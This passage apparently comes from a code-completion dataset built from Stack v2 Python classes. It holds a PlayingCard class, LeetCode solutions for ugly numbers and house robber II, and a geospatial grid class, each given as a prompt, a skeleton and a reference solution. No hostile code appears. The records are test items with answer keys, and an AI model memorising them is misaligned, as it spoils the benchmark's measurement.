"Class -- PlayingCard Represents a playing card. Attributes: value -- the card's value, an integer. suit -- the card's suit, a string", "class_name": "PlayingCard", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass PlayingCard:\n \"\"\"Class -- PlayingCard Represents a playing card. Attributes: value -- the card's value, an integer. suit -- the card's suit, a string\"\"\"\n\n def __init__(self, value, suit):\n \"\"\"Constructor -- creates a new instance of PlayingCard Parameters: self -- the current PlayingCard object value -- the card's value, an integer suit -- the card's suit, a string\"\"\"\n <|body_0|>\n\n def set_name(self):\n \"\"\"Method -- set_name Helper method to set the name of special cards. Parameter: self -- The current PlayingCard object Returns: Nothing. Sets the name attribute if applicable.\"\"\"\n <|body_1|>\n\n def __str__(self):\n \"\"\"Method -- __str__ Creates a string representation of the PlayingCard Parameter: self -- The current PlayingCard object Returns: A string representation of the PlayingCard.\"\"\"\n <|body_2|>\n\n def __eq__(self, other):\n \"\"\"Method -- __eq__ Checks if two objects are equal Parameters: self -- The current PlayingCard object other -- An object to compare self to. 
Returns: True if the two objects are equal, False otherwise.\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.value = value\n self.suit = suit\n self.set_name()\n<|end_body_0|>\n\n<|body_start_1|>\n NAMES = {1: 'Ace', 11: 'Jack', 12: 'Queen', 13: 'King'}\n if self.value in NAMES:\n self.name = NAMES[self.value]\n<|end_body_1|>\n\n<|body_start_2|>\n if self.name is not None:\n return '{} of {}'.format(self.name, self.suit)\n return '{} of {}'.format(self.value, self.suit)\n<|end_body_2|>\n\n<|body_start_3|>\n if type(self) != type(other):\n return False\n return self.value == other.value and self.suit == other.suit\n<|end_body_3|>\n", "id": "stack_v2_sparse_classes_10k_test_000003", "length_bytes": 2418, "license_type": "no_license", "methods": [{"docstring": "Constructor -- creates a new instance of PlayingCard Parameters: self -- the current PlayingCard object value -- the card's value, an integer suit -- the card's suit, a string", "name": "__init__", "signature": "def __init__(self, value, suit)"}, {"docstring": "Method -- set_name Helper method to set the name of special cards. Parameter: self -- The current PlayingCard object Returns: Nothing. Sets the name attribute if applicable.", "name": "set_name", "signature": "def set_name(self)"}, {"docstring": "Method -- __str__ Creates a string representation of the PlayingCard Parameter: self -- The current PlayingCard object Returns: A string representation of the PlayingCard.", "name": "__str__", "signature": "def __str__(self)"}, {"docstring": "Method -- __eq__ Checks if two objects are equal Parameters: self -- The current PlayingCard object other -- An object to compare self to. Returns: True if the two objects are equal, False otherwise.", "name": "__eq__", "signature": "def __eq__(self, other)"}], "n_methods": 4, "original_id": "stack_v2_sparse_classes_30k_train_004873", "prompt": "Implement the Python class `PlayingCard` described below.\n\nClass description:\nClass -- PlayingCard Represents a playing card. Attributes: value -- the card's value, an integer. suit -- the card's suit, a string\n\nMethod signatures and docstrings:\n- def __init__(self, value, suit): Constructor -- creates a new instance of PlayingCard Parameters: self -- the current PlayingCard object value -- the card's value, an integer suit -- the card's suit, a string\n- def set_name(self): Method -- set_name Helper method to set the name of special cards. Parameter: self -- The current PlayingCard object Returns: Nothing. Sets the name attribute if applicable.\n- def __str__(self): Method -- __str__ Creates a string representation of the PlayingCard Parameter: self -- The current PlayingCard object Returns: A string representation of the PlayingCard.\n- def __eq__(self, other): Method -- __eq__ Checks if two objects are equal Parameters: self -- The current PlayingCard object other -- An object to compare self to. Returns: True if the two objects are equal, False otherwise.", "prompted_full_text": "Implement the Python class `PlayingCard` described below.\n\nClass description:\nClass -- PlayingCard Represents a playing card. Attributes: value -- the card's value, an integer. suit -- the card's suit, a string\n\nMethod signatures and docstrings:\n- def __init__(self, value, suit): Constructor -- creates a new instance of PlayingCard Parameters: self -- the current PlayingCard object value -- the card's value, an integer suit -- the card's suit, a string\n- def set_name(self): Method -- set_name Helper method to set the name of special cards. 
Parameter: self -- The current PlayingCard object Returns: Nothing. Sets the name attribute if applicable.\n- def __str__(self): Method -- __str__ Creates a string representation of the PlayingCard Parameter: self -- The current PlayingCard object Returns: A string representation of the PlayingCard.\n- def __eq__(self, other): Method -- __eq__ Checks if two objects are equal Parameters: self -- The current PlayingCard object other -- An object to compare self to. Returns: True if the two objects are equal, False otherwise.\n\n<|skeleton|>\nclass PlayingCard:\n \"\"\"Class -- PlayingCard Represents a playing card. Attributes: value -- the card's value, an integer. suit -- the card's suit, a string\"\"\"\n\n def __init__(self, value, suit):\n \"\"\"Constructor -- creates a new instance of PlayingCard Parameters: self -- the current PlayingCard object value -- the card's value, an integer suit -- the card's suit, a string\"\"\"\n <|body_0|>\n\n def set_name(self):\n \"\"\"Method -- set_name Helper method to set the name of special cards. Parameter: self -- The current PlayingCard object Returns: Nothing. Sets the name attribute if applicable.\"\"\"\n <|body_1|>\n\n def __str__(self):\n \"\"\"Method -- __str__ Creates a string representation of the PlayingCard Parameter: self -- The current PlayingCard object Returns: A string representation of the PlayingCard.\"\"\"\n <|body_2|>\n\n def __eq__(self, other):\n \"\"\"Method -- __eq__ Checks if two objects are equal Parameters: self -- The current PlayingCard object other -- An object to compare self to. Returns: True if the two objects are equal, False otherwise.\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.value = value\n self.suit = suit\n self.set_name()\n<|end_body_0|>\n\n<|body_start_1|>\n NAMES = {1: 'Ace', 11: 'Jack', 12: 'Queen', 13: 'King'}\n if self.value in NAMES:\n self.name = NAMES[self.value]\n<|end_body_1|>\n\n<|body_start_2|>\n if self.name is not None:\n return '{} of {}'.format(self.name, self.suit)\n return '{} of {}'.format(self.value, self.suit)\n<|end_body_2|>\n\n<|body_start_3|>\n if type(self) != type(other):\n return False\n return self.value == other.value and self.suit == other.suit\n<|end_body_3|>\n", "revision_id": "b9281f5f959e0268b75baa2c2b1262712da3780f", "skeleton": "<|skeleton|>\nclass PlayingCard:\n \"\"\"Class -- PlayingCard Represents a playing card. Attributes: value -- the card's value, an integer. suit -- the card's suit, a string\"\"\"\n\n def __init__(self, value, suit):\n \"\"\"Constructor -- creates a new instance of PlayingCard Parameters: self -- the current PlayingCard object value -- the card's value, an integer suit -- the card's suit, a string\"\"\"\n <|body_0|>\n\n def set_name(self):\n \"\"\"Method -- set_name Helper method to set the name of special cards. Parameter: self -- The current PlayingCard object Returns: Nothing. Sets the name attribute if applicable.\"\"\"\n <|body_1|>\n\n def __str__(self):\n \"\"\"Method -- __str__ Creates a string representation of the PlayingCard Parameter: self -- The current PlayingCard object Returns: A string representation of the PlayingCard.\"\"\"\n <|body_2|>\n\n def __eq__(self, other):\n \"\"\"Method -- __eq__ Checks if two objects are equal Parameters: self -- The current PlayingCard object other -- An object to compare self to. 
Returns: True if the two objects are equal, False otherwise.\"\"\"\n <|body_3|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class PlayingCard:\n \"\"\"Class -- PlayingCard Represents a playing card. Attributes: value -- the card's value, an integer. suit -- the card's suit, a string\"\"\"\n\n def __init__(self, value, suit):\n \"\"\"Constructor -- creates a new instance of PlayingCard Parameters: self -- the current PlayingCard object value -- the card's value, an integer suit -- the card's suit, a string\"\"\"\n self.value = value\n self.suit = suit\n self.set_name()\n\n def set_name(self):\n \"\"\"Method -- set_name Helper method to set the name of special cards. Parameter: self -- The current PlayingCard object Returns: Nothing. Sets the name attribute if applicable.\"\"\"\n NAMES = {1: 'Ace', 11: 'Jack', 12: 'Queen', 13: 'King'}\n if self.value in NAMES:\n self.name = NAMES[self.value]\n\n def __str__(self):\n \"\"\"Method -- __str__ Creates a string representation of the PlayingCard Parameter: self -- The current PlayingCard object Returns: A string representation of the PlayingCard.\"\"\"\n if self.name is not None:\n return '{} of {}'.format(self.name, self.suit)\n return '{} of {}'.format(self.value, self.suit)\n\n def __eq__(self, other):\n \"\"\"Method -- __eq__ Checks if two objects are equal Parameters: self -- The current PlayingCard object other -- An object to compare self to. Returns: True if the two objects are equal, False otherwise.\"\"\"\n if type(self) != type(other):\n return False\n return self.value == other.value and self.suit == other.suit\n", "source": "the_stack_v2_python_sparse", "source_path": "in_class_excercise/Lecture 10/cardgame/playingcard.py", "source_repo": "arcPenguinj/CS5001-Intensive-Foundations-of-CS", "split": "test", "star_events_count": 0} {"blob_id": "2dc0f74851d24e31290e96be60ce04183a3df2b8", "bodies": ["heap = []\nheapq.heappush(heap, 1)\nfor _ in range(n):\n ugly = heapq.heappop(heap)\n if ugly % 2 == 0:\n heapq.heappush(heap, ugly * 2)\n elif ugly % 3 == 0:\n heapq.heappush(heap, ugly * 2)\n heapq.heappush(heap, ugly * 3)\n else:\n heapq.heappush(heap, ugly * 2)\n heapq.heappush(heap, ugly * 3)\n heapq.heappush(heap, ugly * 5)\nreturn ugly", "records = set()\nrecords |= set([1, 2, 3, 5])\ncount = 0\nnth_num = 0\nnum = 0\nwhile count < n:\n nth_num += 1\n num = nth_num\n for d in (2, 3, 5):\n while num % d == 0:\n n_new = num // d\n if n_new in records:\n num = 1\n break\n num = n_new\n if num == 1:\n count += 1\n records.add(nth_num)\nreturn nth_num"], "bodies_text": "<|body_start_0|>\n heap = []\n heapq.heappush(heap, 1)\n for _ in range(n):\n ugly = heapq.heappop(heap)\n if ugly % 2 == 0:\n heapq.heappush(heap, ugly * 2)\n elif ugly % 3 == 0:\n heapq.heappush(heap, ugly * 2)\n heapq.heappush(heap, ugly * 3)\n else:\n heapq.heappush(heap, ugly * 2)\n heapq.heappush(heap, ugly * 3)\n heapq.heappush(heap, ugly * 5)\n return ugly\n<|end_body_0|>\n\n<|body_start_1|>\n records = set()\n records |= set([1, 2, 3, 5])\n count = 0\n nth_num = 0\n num = 0\n while count < n:\n nth_num += 1\n num = nth_num\n for d in (2, 3, 5):\n while num % d == 0:\n n_new = num // d\n if n_new in records:\n num = 1\n break\n num = n_new\n if num == 1:\n count += 1\n records.add(nth_num)\n return nth_num\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Solution", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": 
"<|skeleton|>\nclass Solution:\n\n def nthUglyNumber(self, n):\n \"\"\":type n: int :rtype: int\"\"\"\n <|body_0|>\n\n def nthUglyNumber_TLE(self, n):\n \"\"\":type n: int :rtype: int\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n heap = []\n heapq.heappush(heap, 1)\n for _ in range(n):\n ugly = heapq.heappop(heap)\n if ugly % 2 == 0:\n heapq.heappush(heap, ugly * 2)\n elif ugly % 3 == 0:\n heapq.heappush(heap, ugly * 2)\n heapq.heappush(heap, ugly * 3)\n else:\n heapq.heappush(heap, ugly * 2)\n heapq.heappush(heap, ugly * 3)\n heapq.heappush(heap, ugly * 5)\n return ugly\n<|end_body_0|>\n\n<|body_start_1|>\n records = set()\n records |= set([1, 2, 3, 5])\n count = 0\n nth_num = 0\n num = 0\n while count < n:\n nth_num += 1\n num = nth_num\n for d in (2, 3, 5):\n while num % d == 0:\n n_new = num // d\n if n_new in records:\n num = 1\n break\n num = n_new\n if num == 1:\n count += 1\n records.add(nth_num)\n return nth_num\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000004", "length_bytes": 2226, "license_type": "no_license", "methods": [{"docstring": ":type n: int :rtype: int", "name": "nthUglyNumber", "signature": "def nthUglyNumber(self, n)"}, {"docstring": ":type n: int :rtype: int", "name": "nthUglyNumber_TLE", "signature": "def nthUglyNumber_TLE(self, n)"}], "n_methods": 2, "prompt": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def nthUglyNumber(self, n): :type n: int :rtype: int\n- def nthUglyNumber_TLE(self, n): :type n: int :rtype: int", "prompted_full_text": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def nthUglyNumber(self, n): :type n: int :rtype: int\n- def nthUglyNumber_TLE(self, n): :type n: int :rtype: int\n\n<|skeleton|>\nclass Solution:\n\n def nthUglyNumber(self, n):\n \"\"\":type n: int :rtype: int\"\"\"\n <|body_0|>\n\n def nthUglyNumber_TLE(self, n):\n \"\"\":type n: int :rtype: int\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n heap = []\n heapq.heappush(heap, 1)\n for _ in range(n):\n ugly = heapq.heappop(heap)\n if ugly % 2 == 0:\n heapq.heappush(heap, ugly * 2)\n elif ugly % 3 == 0:\n heapq.heappush(heap, ugly * 2)\n heapq.heappush(heap, ugly * 3)\n else:\n heapq.heappush(heap, ugly * 2)\n heapq.heappush(heap, ugly * 3)\n heapq.heappush(heap, ugly * 5)\n return ugly\n<|end_body_0|>\n\n<|body_start_1|>\n records = set()\n records |= set([1, 2, 3, 5])\n count = 0\n nth_num = 0\n num = 0\n while count < n:\n nth_num += 1\n num = nth_num\n for d in (2, 3, 5):\n while num % d == 0:\n n_new = num // d\n if n_new in records:\n num = 1\n break\n num = n_new\n if num == 1:\n count += 1\n records.add(nth_num)\n return nth_num\n<|end_body_1|>\n", "revision_id": "e60ba45fe2f2e5e3b3abfecec3db76f5ce1fde59", "skeleton": "<|skeleton|>\nclass Solution:\n\n def nthUglyNumber(self, n):\n \"\"\":type n: int :rtype: int\"\"\"\n <|body_0|>\n\n def nthUglyNumber_TLE(self, n):\n \"\"\":type n: int :rtype: int\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution:\n def nthUglyNumber(self, n):\n \"\"\":type n: int :rtype: int\"\"\"\n heap = []\n heapq.heappush(heap, 1)\n for _ in range(n):\n ugly = heapq.heappop(heap)\n if ugly % 2 == 0:\n heapq.heappush(heap, ugly * 2)\n elif ugly % 3 == 0:\n heapq.heappush(heap, ugly * 
2)\n heapq.heappush(heap, ugly * 3)\n else:\n heapq.heappush(heap, ugly * 2)\n heapq.heappush(heap, ugly * 3)\n heapq.heappush(heap, ugly * 5)\n return ugly\n\n def nthUglyNumber_TLE(self, n):\n \"\"\":type n: int :rtype: int\"\"\"\n records = set()\n records |= set([1, 2, 3, 5])\n count = 0\n nth_num = 0\n num = 0\n while count < n:\n nth_num += 1\n num = nth_num\n for d in (2, 3, 5):\n while num % d == 0:\n n_new = num // d\n if n_new in records:\n num = 1\n break\n num = n_new\n if num == 1:\n count += 1\n records.add(nth_num)\n return nth_num\n", "source": "the_stack_v2_python_sparse", "source_path": "src/lt_264.py", "source_repo": "oxhead/CodingYourWay", "split": "test", "star_events_count": 0} {"blob_id": "1e12709f54a7ef504a524019d0c1f7dd86608e31", "bodies": ["if len(nums) == 1:\n return nums[0]\n\ndef my_rob(nums):\n if not nums:\n return 0\n if len(nums) == 1:\n return nums[0]\n memo = [0] * len(nums)\n memo[0] = nums[0]\n memo[1] = max(memo[0], nums[1])\n for i in range(2, len(nums)):\n memo[i] = max(memo[i - 2] + nums[i], memo[i - 1])\n return memo[len(nums) - 1]\nreturn max(my_rob(nums[1:]), my_rob(nums[:-1]))", "if len(nums) == 1:\n return nums[0]\n\ndef my_rob(nums):\n if not nums:\n return 0\n if len(nums) == 1:\n return nums[0]\n prev1 = prev2 = 0\n for num in nums:\n temp = prev1\n prev1 = max(prev1, prev2 + num)\n prev2 = temp\n return prev1\nreturn max(my_rob(nums[1:]), my_rob(nums[:-1]))"], "bodies_text": "<|body_start_0|>\n if len(nums) == 1:\n return nums[0]\n\n def my_rob(nums):\n if not nums:\n return 0\n if len(nums) == 1:\n return nums[0]\n memo = [0] * len(nums)\n memo[0] = nums[0]\n memo[1] = max(memo[0], nums[1])\n for i in range(2, len(nums)):\n memo[i] = max(memo[i - 2] + nums[i], memo[i - 1])\n return memo[len(nums) - 1]\n return max(my_rob(nums[1:]), my_rob(nums[:-1]))\n<|end_body_0|>\n\n<|body_start_1|>\n if len(nums) == 1:\n return nums[0]\n\n def my_rob(nums):\n if not nums:\n return 0\n if len(nums) == 1:\n return nums[0]\n prev1 = prev2 = 0\n for num in nums:\n temp = prev1\n prev1 = max(prev1, prev2 + num)\n prev2 = temp\n return prev1\n return max(my_rob(nums[1:]), my_rob(nums[:-1]))\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Solution", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution:\n\n def rob(self, nums):\n \"\"\":type nums: List[int] :rtype: int\"\"\"\n <|body_0|>\n\n def rob_2variables(self, nums):\n \"\"\"time O(n) space O(1) :type nums: List[int] :rtype: int\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if len(nums) == 1:\n return nums[0]\n\n def my_rob(nums):\n if not nums:\n return 0\n if len(nums) == 1:\n return nums[0]\n memo = [0] * len(nums)\n memo[0] = nums[0]\n memo[1] = max(memo[0], nums[1])\n for i in range(2, len(nums)):\n memo[i] = max(memo[i - 2] + nums[i], memo[i - 1])\n return memo[len(nums) - 1]\n return max(my_rob(nums[1:]), my_rob(nums[:-1]))\n<|end_body_0|>\n\n<|body_start_1|>\n if len(nums) == 1:\n return nums[0]\n\n def my_rob(nums):\n if not nums:\n return 0\n if len(nums) == 1:\n return nums[0]\n prev1 = prev2 = 0\n for num in nums:\n temp = prev1\n prev1 = max(prev1, prev2 + num)\n prev2 = temp\n return prev1\n return max(my_rob(nums[1:]), my_rob(nums[:-1]))\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000005", "length_bytes": 1316, "license_type": "no_license", "methods": [{"docstring": ":type nums: List[int] :rtype: int", "name": "rob", "signature": "def rob(self, nums)"}, {"docstring": "time O(n) 
space O(1) :type nums: List[int] :rtype: int", "name": "rob_2variables", "signature": "def rob_2variables(self, nums)"}], "n_methods": 2, "prompt": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def rob(self, nums): :type nums: List[int] :rtype: int\n- def rob_2variables(self, nums): time O(n) space O(1) :type nums: List[int] :rtype: int", "prompted_full_text": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def rob(self, nums): :type nums: List[int] :rtype: int\n- def rob_2variables(self, nums): time O(n) space O(1) :type nums: List[int] :rtype: int\n\n<|skeleton|>\nclass Solution:\n\n def rob(self, nums):\n \"\"\":type nums: List[int] :rtype: int\"\"\"\n <|body_0|>\n\n def rob_2variables(self, nums):\n \"\"\"time O(n) space O(1) :type nums: List[int] :rtype: int\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if len(nums) == 1:\n return nums[0]\n\n def my_rob(nums):\n if not nums:\n return 0\n if len(nums) == 1:\n return nums[0]\n memo = [0] * len(nums)\n memo[0] = nums[0]\n memo[1] = max(memo[0], nums[1])\n for i in range(2, len(nums)):\n memo[i] = max(memo[i - 2] + nums[i], memo[i - 1])\n return memo[len(nums) - 1]\n return max(my_rob(nums[1:]), my_rob(nums[:-1]))\n<|end_body_0|>\n\n<|body_start_1|>\n if len(nums) == 1:\n return nums[0]\n\n def my_rob(nums):\n if not nums:\n return 0\n if len(nums) == 1:\n return nums[0]\n prev1 = prev2 = 0\n for num in nums:\n temp = prev1\n prev1 = max(prev1, prev2 + num)\n prev2 = temp\n return prev1\n return max(my_rob(nums[1:]), my_rob(nums[:-1]))\n<|end_body_1|>\n", "revision_id": "85f71621c54f6b0029f3a2746f022f89dd7419d9", "skeleton": "<|skeleton|>\nclass Solution:\n\n def rob(self, nums):\n \"\"\":type nums: List[int] :rtype: int\"\"\"\n <|body_0|>\n\n def rob_2variables(self, nums):\n \"\"\"time O(n) space O(1) :type nums: List[int] :rtype: int\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution:\n def rob(self, nums):\n \"\"\":type nums: List[int] :rtype: int\"\"\"\n if len(nums) == 1:\n return nums[0]\n\n def my_rob(nums):\n if not nums:\n return 0\n if len(nums) == 1:\n return nums[0]\n memo = [0] * len(nums)\n memo[0] = nums[0]\n memo[1] = max(memo[0], nums[1])\n for i in range(2, len(nums)):\n memo[i] = max(memo[i - 2] + nums[i], memo[i - 1])\n return memo[len(nums) - 1]\n return max(my_rob(nums[1:]), my_rob(nums[:-1]))\n\n def rob_2variables(self, nums):\n \"\"\"time O(n) space O(1) :type nums: List[int] :rtype: int\"\"\"\n if len(nums) == 1:\n return nums[0]\n\n def my_rob(nums):\n if not nums:\n return 0\n if len(nums) == 1:\n return nums[0]\n prev1 = prev2 = 0\n for num in nums:\n temp = prev1\n prev1 = max(prev1, prev2 + num)\n prev2 = temp\n return prev1\n return max(my_rob(nums[1:]), my_rob(nums[:-1]))\n", "source": "the_stack_v2_python_sparse", "source_path": "LeetCode/DynamicProgramming/213_house_robber_ii.py", "source_repo": "XyK0907/for_work", "split": "test", "star_events_count": 0} {"blob_id": "11e6fe728794e8cb4910e5c8b8e0a769d5ee1951", "bodies": ["transform = self.transform\nif transform.a < 0 or transform.e > 0:\n raise NotImplementedError\nx_min = transform.xoff\nx_max = x_min + self.cols * self.resolution\ny_max = transform.yoff\ny_min = y_max - self.rows * self.resolution\nx_range, 
y_range = rasterio.transform.xy(self.transform, [0, self.rows - 1], [0, self.cols - 1])\nxs = np.linspace(x_range[0], x_range[1], self.cols)\nys = np.linspace(y_range[0], y_range[1], self.rows)\nX, Y = np.meshgrid(xs, ys)\ncenter_x = xs.mean()\ncenter_y = ys.mean()\ncenter_lon, center_lat = transform_coords(center_x, center_y, self.crs, constants.CRS_WGS84)\nself.x_min = x_min\nself.x_max = x_max\nself.y_min = y_min\nself.y_max = y_max\nself.xs = xs\nself.ys = ys\nself.X = X\nself.Y = Y\nself.all_points = np.column_stack((X.flat, Y.flat))\nself.center_lon = center_lon\nself.center_lat = center_lat\nself.prepare_roi_coordinates()", "if 'roi' not in self:\n self.roi = np.ones((self.rows, self.cols), dtype=bool)\nroi_xs = self.X[self.roi]\nroi_ys = self.Y[self.roi]\nself.roi_points = np.column_stack((roi_xs, roi_ys))\nself.roi_idxs = np.array(np.where(self.roi)).T\nself.roi_idxs_flat = np.where(self.roi.flat)[0]"], "bodies_text": "<|body_start_0|>\n transform = self.transform\n if transform.a < 0 or transform.e > 0:\n raise NotImplementedError\n x_min = transform.xoff\n x_max = x_min + self.cols * self.resolution\n y_max = transform.yoff\n y_min = y_max - self.rows * self.resolution\n x_range, y_range = rasterio.transform.xy(self.transform, [0, self.rows - 1], [0, self.cols - 1])\n xs = np.linspace(x_range[0], x_range[1], self.cols)\n ys = np.linspace(y_range[0], y_range[1], self.rows)\n X, Y = np.meshgrid(xs, ys)\n center_x = xs.mean()\n center_y = ys.mean()\n center_lon, center_lat = transform_coords(center_x, center_y, self.crs, constants.CRS_WGS84)\n self.x_min = x_min\n self.x_max = x_max\n self.y_min = y_min\n self.y_max = y_max\n self.xs = xs\n self.ys = ys\n self.X = X\n self.Y = Y\n self.all_points = np.column_stack((X.flat, Y.flat))\n self.center_lon = center_lon\n self.center_lat = center_lat\n self.prepare_roi_coordinates()\n<|end_body_0|>\n\n<|body_start_1|>\n if 'roi' not in self:\n self.roi = np.ones((self.rows, self.cols), dtype=bool)\n roi_xs = self.X[self.roi]\n roi_ys = self.Y[self.roi]\n self.roi_points = np.column_stack((roi_xs, roi_ys))\n self.roi_idxs = np.array(np.where(self.roi)).T\n self.roi_idxs_flat = np.where(self.roi.flat)[0]\n<|end_body_1|>\n", "class_docstring": "Container for storing model grid related variables.", "class_name": "ModelGrid", "detected_licenses": ["MIT"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass ModelGrid:\n \"\"\"Container for storing model grid related variables.\"\"\"\n\n def prepare_coordinates(self):\n \"\"\"Prepare a range of variables related to the grid coordinates: - xs, ys: 1d-arrays containing the x and y coordinates in the grid CRS. - X, Y, 2d-arrays containing the x and y coordinates for each grid point. - all_points: (N, 2)-array containing (x, y) coordinates of all grid points. - roi_points: (N, 2)-array containing (x, y) coordinates of all ROI points. - roi_idxs: (N, 2)-array containing (row, col) indexes of all ROI points. 
- roi_idxs_flat: 1d-array containing the flattened (1d) indexes of all ROI points\"\"\"\n <|body_0|>\n\n def prepare_roi_coordinates(self):\n \"\"\"Update the roi_points and roi_idxs variables using the ROI field.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n transform = self.transform\n if transform.a < 0 or transform.e > 0:\n raise NotImplementedError\n x_min = transform.xoff\n x_max = x_min + self.cols * self.resolution\n y_max = transform.yoff\n y_min = y_max - self.rows * self.resolution\n x_range, y_range = rasterio.transform.xy(self.transform, [0, self.rows - 1], [0, self.cols - 1])\n xs = np.linspace(x_range[0], x_range[1], self.cols)\n ys = np.linspace(y_range[0], y_range[1], self.rows)\n X, Y = np.meshgrid(xs, ys)\n center_x = xs.mean()\n center_y = ys.mean()\n center_lon, center_lat = transform_coords(center_x, center_y, self.crs, constants.CRS_WGS84)\n self.x_min = x_min\n self.x_max = x_max\n self.y_min = y_min\n self.y_max = y_max\n self.xs = xs\n self.ys = ys\n self.X = X\n self.Y = Y\n self.all_points = np.column_stack((X.flat, Y.flat))\n self.center_lon = center_lon\n self.center_lat = center_lat\n self.prepare_roi_coordinates()\n<|end_body_0|>\n\n<|body_start_1|>\n if 'roi' not in self:\n self.roi = np.ones((self.rows, self.cols), dtype=bool)\n roi_xs = self.X[self.roi]\n roi_ys = self.Y[self.roi]\n self.roi_points = np.column_stack((roi_xs, roi_ys))\n self.roi_idxs = np.array(np.where(self.roi)).T\n self.roi_idxs_flat = np.where(self.roi.flat)[0]\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000006", "length_bytes": 6138, "license_type": "permissive", "methods": [{"docstring": "Prepare a range of variables related to the grid coordinates: - xs, ys: 1d-arrays containing the x and y coordinates in the grid CRS. - X, Y, 2d-arrays containing the x and y coordinates for each grid point. - all_points: (N, 2)-array containing (x, y) coordinates of all grid points. - roi_points: (N, 2)-array containing (x, y) coordinates of all ROI points. - roi_idxs: (N, 2)-array containing (row, col) indexes of all ROI points. - roi_idxs_flat: 1d-array containing the flattened (1d) indexes of all ROI points", "name": "prepare_coordinates", "signature": "def prepare_coordinates(self)"}, {"docstring": "Update the roi_points and roi_idxs variables using the ROI field.", "name": "prepare_roi_coordinates", "signature": "def prepare_roi_coordinates(self)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_test_000128", "prompt": "Implement the Python class `ModelGrid` described below.\n\nClass description:\nContainer for storing model grid related variables.\n\nMethod signatures and docstrings:\n- def prepare_coordinates(self): Prepare a range of variables related to the grid coordinates: - xs, ys: 1d-arrays containing the x and y coordinates in the grid CRS. - X, Y, 2d-arrays containing the x and y coordinates for each grid point. - all_points: (N, 2)-array containing (x, y) coordinates of all grid points. - roi_points: (N, 2)-array containing (x, y) coordinates of all ROI points. - roi_idxs: (N, 2)-array containing (row, col) indexes of all ROI points. 
- roi_idxs_flat: 1d-array containing the flattened (1d) indexes of all ROI points\n- def prepare_roi_coordinates(self): Update the roi_points and roi_idxs variables using the ROI field.", "prompted_full_text": "Implement the Python class `ModelGrid` described below.\n\nClass description:\nContainer for storing model grid related variables.\n\nMethod signatures and docstrings:\n- def prepare_coordinates(self): Prepare a range of variables related to the grid coordinates: - xs, ys: 1d-arrays containing the x and y coordinates in the grid CRS. - X, Y, 2d-arrays containing the x and y coordinates for each grid point. - all_points: (N, 2)-array containing (x, y) coordinates of all grid points. - roi_points: (N, 2)-array containing (x, y) coordinates of all ROI points. - roi_idxs: (N, 2)-array containing (row, col) indexes of all ROI points. - roi_idxs_flat: 1d-array containing the flattened (1d) indexes of all ROI points\n- def prepare_roi_coordinates(self): Update the roi_points and roi_idxs variables using the ROI field.\n\n<|skeleton|>\nclass ModelGrid:\n \"\"\"Container for storing model grid related variables.\"\"\"\n\n def prepare_coordinates(self):\n \"\"\"Prepare a range of variables related to the grid coordinates: - xs, ys: 1d-arrays containing the x and y coordinates in the grid CRS. - X, Y, 2d-arrays containing the x and y coordinates for each grid point. - all_points: (N, 2)-array containing (x, y) coordinates of all grid points. - roi_points: (N, 2)-array containing (x, y) coordinates of all ROI points. - roi_idxs: (N, 2)-array containing (row, col) indexes of all ROI points. - roi_idxs_flat: 1d-array containing the flattened (1d) indexes of all ROI points\"\"\"\n <|body_0|>\n\n def prepare_roi_coordinates(self):\n \"\"\"Update the roi_points and roi_idxs variables using the ROI field.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n transform = self.transform\n if transform.a < 0 or transform.e > 0:\n raise NotImplementedError\n x_min = transform.xoff\n x_max = x_min + self.cols * self.resolution\n y_max = transform.yoff\n y_min = y_max - self.rows * self.resolution\n x_range, y_range = rasterio.transform.xy(self.transform, [0, self.rows - 1], [0, self.cols - 1])\n xs = np.linspace(x_range[0], x_range[1], self.cols)\n ys = np.linspace(y_range[0], y_range[1], self.rows)\n X, Y = np.meshgrid(xs, ys)\n center_x = xs.mean()\n center_y = ys.mean()\n center_lon, center_lat = transform_coords(center_x, center_y, self.crs, constants.CRS_WGS84)\n self.x_min = x_min\n self.x_max = x_max\n self.y_min = y_min\n self.y_max = y_max\n self.xs = xs\n self.ys = ys\n self.X = X\n self.Y = Y\n self.all_points = np.column_stack((X.flat, Y.flat))\n self.center_lon = center_lon\n self.center_lat = center_lat\n self.prepare_roi_coordinates()\n<|end_body_0|>\n\n<|body_start_1|>\n if 'roi' not in self:\n self.roi = np.ones((self.rows, self.cols), dtype=bool)\n roi_xs = 